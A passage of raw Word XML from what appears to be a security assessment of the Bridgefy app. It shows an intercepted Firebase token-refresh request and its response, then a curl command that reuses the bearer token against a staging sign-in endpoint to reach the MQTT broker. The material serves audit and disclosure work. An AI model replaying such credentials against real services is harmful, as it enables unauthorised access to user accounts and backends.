        <w:t>11;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ONEPLUS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>A3000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Build/RQ3A.211001.001) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: securetoken.googleapis.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Connection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>close</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Accept-Encoding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: gzip, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>deflate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="63"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"grantType"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"refresh_token"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"refreshToken"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"AOkPPWR"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Response:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="917" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"access_token"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"eyJhbGciOiJSUzI1NiIsImtpZ[...]",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="917" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="917" w:right="4309" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"user_id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"U309RRQIulX95ChRjWv16PqwFlp1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"project_id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"1052189342245"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="66"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>then</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>executed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MQTT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>broker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -i -s -k -H </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'Accept: application/json' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-H </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'Authorization: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Bearer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>eyJhbGciOiJSUzI1NiIsImtpZ[...]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-H </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'Content-Type: application/json; charset=UTF-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>8'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'{"versionOs":"13.5","platform":"iOS","location":"PE","pushToken":"d4q06lbiiEbXt8pl14c- oK:APA91bHVnXrSugH7NMsBwRGZZYRi4pXCmxYaL6GnxjJhZZx7rXyiZjPApjoN-V4w3n_-W0c-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>yJYkk6VPv8Pd YP2J3xlmzFc0uCOonWJNBM8Y9zC2hDl7i6Jif6JgZOaeOjtbzWt7FH2A","versionSdk":"1",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"uid":"U309R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>RQIulX95ChRjWv16PqwFlp1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,"versionApp":"1.0.0"}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487595008">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>139086</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="27" name="Graphic 27"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="27" name="Graphic 27"/>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0.951709pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15721472;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape18" coordorigin="1440,219" coordsize="2880,0" path="m1440,219l4320,219e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="105"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId39">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://portswigger.net/burp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="21"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId40">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://owasp.org/www-project-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-4"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>zap/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId41">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://www.telerik.com/fiddler</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'https://staging.app.bridgefy.services/app/v1/user/signin'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"response"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"uuid"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
